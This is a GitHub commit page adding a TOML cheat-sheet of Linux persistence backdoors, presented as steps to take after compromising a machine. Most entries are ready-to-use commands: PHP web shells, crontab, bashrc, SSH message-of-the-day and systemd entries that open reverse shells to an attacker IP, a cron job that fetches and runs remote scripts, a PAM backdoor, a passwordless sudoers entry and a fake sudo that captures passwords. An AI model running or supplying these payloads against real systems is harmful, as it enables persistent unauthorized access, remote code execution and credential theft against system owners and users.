-
Notifications
You must be signed in to change notification settings - Fork 3
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Nicholas Ferreira
committed
Oct 24, 2023
1 parent
04f2b1b
commit e150eb7
Showing
2 changed files
with
135 additions
and
8 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,126 @@ | ||
title = "Linux backdoors" | ||
description = "What to do to backdoor a linux machine once you got access to it" | ||
tags = ["linux", "backdoor", "php", "ssh", ] | ||
source = ["https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c","http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html","https://tryhackme.com/room/linuxbackdoors", "https://gist.github.com/hoefler02/2ca8166c167f147c8fb076b48eb7cb47", "https://r.0x7359.com/", "https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9", "https://hosakacorp.net/p/systemd-user.html", "https://gist.github.com/ahhh/1d4bf832c5a88cc75adb"] | ||
|
||
[[data]] | ||
description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file." | ||
language = "bash" | ||
command = """#On your machine: | ||
ssh-keygen -f ./backdoor | ||
cat backdoor.pub #Copy the public key | ||
#On the compromised machine (substitute <public key>): | ||
echo '<public key>' >> ~/.ssh/authorized_keys | ||
#Connect to the compromised machine with | ||
ssh compromised-user@machine-ip -i backdoor""" | ||
|
||
[[data]] | ||
description = """Web PHP backdoor. | ||
Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):""" | ||
language = "php" | ||
command = """<?php shell_exec($_REQUEST['x']);""" | ||
|
||
[[data]] | ||
description = "Web PHP backdoor (even stealthier):" | ||
language = "php" | ||
command = """#Run commands with | ||
# curl -H "x:ls -la" example.com/backdoor.php | ||
# curl -H "x:cat /etc/passwd" example.com/backdoor.php | ||
<?php echo shell_exec($_SERVER['HTTP_X']);?>""" | ||
|
||
[[data]] | ||
description = "Tiniest PHP backdoor possible:" | ||
language = "php" | ||
command = """#Run commands with example.com/backdoor.php?0=ls -la | ||
<?=`$_GET[0]`?>""" | ||
|
||
[[data]] | ||
description = "Crontab backdoor keeping existing crontabs (substitute <ATTACKER IP> and <PORT>):" | ||
language = "bash" | ||
command = """(crontab -l > .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Crontab backdoor overwriting existing crontabs:" | ||
language = "bash" | ||
command = """(touch .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Example sending bash reverse shell every 5 min:" | ||
language = "bash" | ||
command = """(touch .tab ; echo "*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/<ATTACKER ip>/<PORT> 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = """Running arbitrary commands every minute with cron via http. | ||
Set up a webserver and create a file named 'run'. Put on it the commands you want to run on the compromised machine.""" | ||
language = "bash" | ||
command = """(crontab -l > .tab ; echo "* * * * * 'curl https://<ATTACKER IP>/run | sh'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1""" | ||
|
||
[[data]] | ||
description = "Bashrc backdoor. Will run everytime a new terminal session is started:" | ||
language = "bash" | ||
command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc""" | ||
|
||
[[data]] | ||
description = "PAM backdoor to log in into any user (root required):" | ||
language = "bash" | ||
command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc | ||
git clone https://github.com/zephrax/linux-pam-backdoor | ||
#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases) | ||
./backdoor.sh -v 1.4.0 -p passw0rd | ||
#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine. | ||
#Now log in into any user using the password 'passw0rd'.""" | ||
|
||
[[data]] | ||
description = "Add your unprivileged user to sudoers (substitute <USER>) (root required)" | ||
language = "bash" | ||
command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers""" | ||
|
||
[[data]] | ||
description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH:" | ||
language = "bash" | ||
command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f &' > 20-backdoor && chmod +x 20-backdoor""" | ||
|
||
[[data]] | ||
description = "Backdooring systemd services. Change <ATTACKER IP> and <ATTACKER PORT> and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:" | ||
language = "ini" | ||
command = """#!/bin/sh | ||
IP="<ATTACKER IP>" | ||
PORT="<ATTACKER PORT>" | ||
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/" | ||
W_PATH="" | ||
UNIT="voodoo.service" | ||
UNIT_CONTENT="[Unit] | ||
Description=Black magic happening, avert your eyes | ||
[Service] | ||
RemainAfterExit=yes | ||
Type=simple | ||
ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\" | ||
[Install] | ||
WantedBy=default.target" | ||
for i in $SYSTEMD_PATH; do | ||
mkdir -p "$i" | ||
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi | ||
done | ||
for k in $W_PATH; do | ||
echo "$UNIT_CONTENT" > "$k/$UNIT" | ||
echo "[*] created voodoo in '$k/$UNIT" | ||
done | ||
systemctl --user daemon-reload | ||
systemctl --user restart $UNIT > /dev/null | ||
systemctl --user enable $UNIT""" | ||
|
||
[[data]] | ||
description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:" | ||
language = "bash" | ||
command = """#Change /tmp/sudo if needed | ||
wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo | ||
chmod +x /tmp/sudo | ||
echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc""" |